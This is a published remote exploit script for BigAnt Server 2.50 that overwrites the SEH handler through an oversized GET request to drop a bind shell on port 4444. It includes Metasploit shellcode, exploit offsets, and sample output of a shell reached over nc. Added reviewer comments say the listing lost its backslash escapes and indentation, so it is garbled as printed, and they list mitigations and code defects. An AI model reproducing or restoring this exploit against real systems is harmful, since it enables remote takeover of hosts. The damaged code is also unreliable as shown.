# Title : BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) 0day
# Published : 2009-09-15
# Author : Blake
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
# NOTE(review): this listing lost its backslashes in transit -- every "\x.."
# byte escape and "\n" newline below is printed as "x.." / "n", and the bodies
# of the if/try/except blocks have lost their indentation. As printed it does
# not parse under Python 2 (the print statements and bare `except:` mark it as
# 2.x code) and it is not valid Python 3. It is kept as a historical record of
# the published technique, not as a runnable tool.
#
# What the script does, from the code and its own comments: connect over TCP to
# <ip>:<port> (6660 by default, per the comment on the port line), send one
# oversized "GET " request line -- 985 filler bytes, a 4-byte SEH "next"
# record, a 4-byte handler address from vbajet32.dll, a short nop sled and a
# bind-shell payload -- terminated by CRLF CRLF, then close the socket.
#
# Defensive takeaways grounded in the constants below:
#   - The trigger is a request line of roughly 1.7 KB consisting of a single
#     repeated byte followed by non-printable bytes; a length/character check
#     on the request line before it is copied, or an IDS rule for such a line,
#     catches it ahead of the overflow.
#   - The handler address is taken from vbajet32.dll, presumably because that
#     module is not SafeSEH-compiled -- confirm; SafeSEH/DEP-protected builds
#     and keeping the service off untrusted networks are the mitigations.
#   - Post-exploitation indicator: a new listener on TCP 4444 on the host.
if len(sys.argv)!= 3:
# Usage check. Exiting with status 0 on a usage error is a defect (a caller
# cannot distinguish it from success); left as published.
print "n[*] Usage: %s <ip> <port>n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
# Payload as emitted by the Metasploit shell_bind_tcp module (per the comment
# above). With the escapes lost, the literal below is the text "x89xe2..."
# rather than the raw bytes it originally encoded.
shellcode = (
"x89xe2xdbxccxd9x72xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x46x44x4cx4b"
"x50x45x47x4cx4cx4bx43x4cx43x35x44x38x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51"
"x4ax4bx50x49x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4bx34x49x50x44x34x43x37"
"x49x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47"
"x4bx50x54x46x44x46x48x44x35x4bx55x4cx4bx51x4f"
"x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx47x54x45x4cx43x51x49x53x50x31x49"
"x4bx43x54x4cx4bx47x33x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x45x36x46x33x43x56x45x38x47x43x46x52x42"
"x48x43x47x42x53x46x52x51x4fx50x54x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48"
"x56x51x4fx4dx59x4bx55x45x36x4bx31x4ax4dx43x38"
"x45x52x46x35x43x5ax45x52x4bx4fx48x50x45x38x49"
"x49x44x49x4ax55x4ex4dx51x47x4bx4fx48x56x51x43"
"x51x43x51x43x51x43x46x33x51x53x50x53x47x33x51"
"x43x4bx4fx4ex30x42x46x43x58x42x31x51x4cx45x36"
"x46x33x4bx39x4dx31x4cx55x45x38x4ex44x44x5ax42"
"x50x49x57x50x57x4bx4fx49x46x42x4ax44x50x50x51"
"x50x55x4bx4fx48x50x45x38x49x34x4ex4dx46x4ex4a"
"x49x46x37x4bx4fx4ex36x50x53x46x35x4bx4fx48x50"
"x43x58x4bx55x47x39x4cx46x50x49x46x37x4bx4fx48"
"x56x46x30x50x54x50x54x46x35x4bx4fx4ex30x4cx53"
"x42x48x4bx57x44x39x48x46x44x39x50x57x4bx4fx48"
"x56x51x45x4bx4fx4ex30x42x46x43x5ax42x44x42x46"
"x43x58x43x53x42x4dx4cx49x4bx55x43x5ax46x30x51"
"x49x51x39x48x4cx4dx59x4dx37x42x4ax51x54x4bx39"
"x4ax42x50x31x49x50x4ax53x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex50x42x46x4cx4ax33x4cx4dx43x4ax47x48"
"x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x42"
"x36x4bx4fx42x55x47x34x4bx4fx49x46x51x4bx50x57"
"x51x42x50x51x46x31x50x51x43x5ax43x31x50x51x50"
"x51x51x45x50x51x4bx4fx48x50x42x48x4ex4dx48x59"
"x45x55x48x4ex50x53x4bx4fx49x46x42x4ax4bx4fx4b"
"x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33"
"x48x44x45x34x4bx4fx49x46x50x52x4bx4fx4ex30x45"
"x38x4ax50x4dx5ax43x34x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")
# Layout, per the author's offsets: 985 filler bytes, then the 4-byte "next
# SEH" field, then the handler address at offset 989 (985 + 4).
payload = "x41" * 985 # seh overwritten at 989
# Overwrites the "next SEH" pointer with a 2-byte short jump (rel8 = 6) and two
# bytes of padding; the jump skips the rest of this field plus the 4-byte
# handler address and lands at the start of the nop sled.
next_seh = "xebx06x90x90" # short jump 6 bytes
# Handler address: a pop/pop/ret gadget in vbajet32.dll (author's comment);
# presumably chosen because that module lacks SafeSEH -- confirm.
seh = "x6ax19x9ax0f" # p/p/r from vbajet32.dll
nops = "x90" * 10 # nop sled
sc = shellcode # 710 bytes available for shellcode
print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
# Bare `except:` swallows every exception (KeyboardInterrupt included) and then
# exits 0; `except socket.error` with a nonzero exit status would be the
# correct form. No timeout is set on the socket, so a silent host blocks here.
except:
print "[x] Error establishing connectionn"
sys.exit(0)
print "[+] Sending payload"
# One write: "GET " + overflow + shellcode + the CRLF CRLF that terminates an
# HTTP request. No response is read; the socket is closed immediately after.
# `send` may write fewer bytes than requested; `sendall` would be the safe
# call, left as published.
s.send("GET " + payload + next_seh + seh + nops + sc + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"